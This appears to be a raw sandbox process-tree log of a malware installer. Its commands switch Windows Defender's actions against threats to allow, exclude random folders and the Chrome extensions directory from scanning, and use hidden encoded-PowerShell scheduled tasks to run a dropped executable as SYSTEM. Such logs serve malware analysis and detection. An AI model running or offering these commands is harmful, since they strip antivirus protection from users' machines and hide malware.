c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\7zS7ACD.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS7ACD.tmp\Install.exe it /TiGdidkyTK 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1896
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5492
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6044
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:704
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1752
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:312
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4132
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:832
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3428
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5452
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3712
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2996
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5076
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6040
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5872
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5420
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6040
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4164
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4564
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gPnHmWocr" /SC once /ST 12:08:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4576
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gPnHmWocr"
  2⤵
  PID:1276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gPnHmWocr"
  2⤵
  PID:3244
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 17:51:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\MFzQQXm.exe\" GH /hVKedidss 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:2072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5964

C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\Install.exe it /zexdidXFlt 385118 /S
1⤵
- Executes dropped EXE
PID:1028
- C:\Windows\SysWOW64\cmd.exe
